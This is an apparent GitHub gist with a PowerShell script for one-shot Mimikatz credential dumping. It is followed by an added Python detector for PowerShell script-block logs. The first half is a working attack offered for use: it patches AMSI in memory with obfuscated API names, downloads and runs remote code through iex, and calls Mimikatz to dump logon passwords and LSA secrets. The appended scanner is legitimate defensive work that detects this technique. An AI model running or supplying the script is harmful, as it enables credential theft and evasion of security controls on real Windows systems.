Forked from pich4ya/Invoke-OneShot-Mimikatz.ps1
Last active August 12, 2022 08:08
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
# Confirmed working on Windows 10 (2022)
# Don't download this file; instead execute the next line in a command prompt (cmd.exe)
# powershell iex (wget
# You will get creds
# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021)
$code = @"
using System;
using System.Runtime.InteropServices;
public class WinApi {
public static extern IntPtr LoadLibrary(string name);
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out int lpflOldProtect);
Add-Type $code
$amsiDll = [WinApi]::LoadLibrary("amsi.dll")
$asbAddr = [WinApi]::GetProcAddress($amsiDll, "Ams"+"iScan"+"Buf"+"fer")
$ret = [Byte[]] ( 0xc3, 0x80, 0x07, 0x00,0x57, 0xb8 )
$out = 0
[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, 0x40, [ref] $out)
[System.Runtime.InteropServices.Marshal]::Copy($ret, 0, $asbAddr, $ret.Length)
[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, $out, [ref] $null)
# nishang - 2.2.0 (Jul 24, 2021)
# Change this to "attacker-local-ip" for internal sources
wget('').Content |iex
# The doubled single quote here is intentional.
Invoke-SoHighSoHigh -Command '"privile''ge::debug" "token::elevate" "sekurlsa::logonPasswords full" "lsadump::secrets"'
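Added here as a defender-side example, not part of the gist: a small Python scanner for PowerShell script block log text (Event ID 4104) that folds the split-string trick used above ("Ams"+"iScan"+"Buf"+"fer") back into one literal before matching, and reassembles script blocks that the log splits across several fragments. The event records are constructed for the example; the field names ScriptBlockId, MessageNumber, MessageTotal and ScriptBlockText follow the 4104 event's fields, while the indicator names and the hit threshold are my own choices.

```python
import re

# Indicators taken from the script above: patching AMSI in-process needs to load
# amsi.dll, resolve AmsiScanBuffer, make its page writable, and overwrite it.
INDICATORS = {
    "amsi_dll_load":  re.compile(r"amsi\.dll", re.IGNORECASE),
    "amsiscanbuffer": re.compile(r"amsiscanbuffer", re.IGNORECASE),
    "virtualprotect": re.compile(r"virtualprotect", re.IGNORECASE),
    "marshal_copy":   re.compile(r"marshal\]::copy", re.IGNORECASE),
}

# Two adjacent PowerShell string literals joined with "+", e.g. "Ams"+"iScan".
_CONCAT = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3""")


def normalize(script: str) -> str:
    """Fold chained string concatenations into a single literal so that the
    split-API-name evasion used in the gist does not hide 'AmsiScanBuffer'."""
    prev = None
    while prev != script:  # repeat until no more pairs can be folded
        prev = script
        script = _CONCAT.sub(lambda m: f'"{m.group(2)}{m.group(4)}"', script)
    return script


def analyze_script_block(script: str):
    """Return the sorted names of indicators present in one script block."""
    text = normalize(script)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_amsi_patch_candidate(script: str, threshold: int = 3) -> bool:
    """Hypothetical scoring rule: three or more indicators in one block."""
    return len(analyze_script_block(script)) >= threshold


def reassemble(events):
    """Join fragmented script blocks (one 4104 event per fragment) by ScriptBlockId,
    ordering fragments by MessageNumber, as the log writes them."""
    blocks = {}
    for ev in sorted(events, key=lambda e: (e["ScriptBlockId"], e["MessageNumber"])):
        blocks.setdefault(ev["ScriptBlockId"], []).append(ev["ScriptBlockText"])
    return {sbid: "".join(parts) for sbid, parts in blocks.items()}


def find_amsi_patch_candidates(events, threshold: int = 3):
    """Map ScriptBlockId -> indicator names for every reassembled block over threshold."""
    return {sbid: analyze_script_block(text)
            for sbid, text in reassemble(events).items()
            if is_amsi_patch_candidate(text, threshold)}


# Constructed 4104-style records (not real telemetry). Block "A" is the gist's
# technique split over two fragments; block "B" is an ordinary admin one-liner.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "A", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": '$amsiDll = [WinApi]::LoadLibrary("amsi.dll")\n'
                        '$asbAddr = [WinApi]::GetProcAddress($amsiDll, "Ams"+"iScan"+"Buf"+"fer")\n'},
    {"ScriptBlockId": "A", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": '[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, 0x40, [ref] $out)\n'
                        '[System.Runtime.InteropServices.Marshal]::Copy($ret, 0, $asbAddr, $ret.Length)\n'},
    {"ScriptBlockId": "B", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": 'Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name, Id\n'},
]

if __name__ == "__main__":
    for sbid, hits in find_amsi_patch_candidates(SAMPLE_EVENTS).items():
        print(f"script block {sbid}: AMSI patch indicators {hits}")
```

Neither fragment of block "A" reaches the threshold on its own (two indicators each), so scanning 4104 events one at a time misses the pattern; only the reassembled block scores four. The normalization step is what lets the plain `amsiscanbuffer` pattern match the gist's concatenated form.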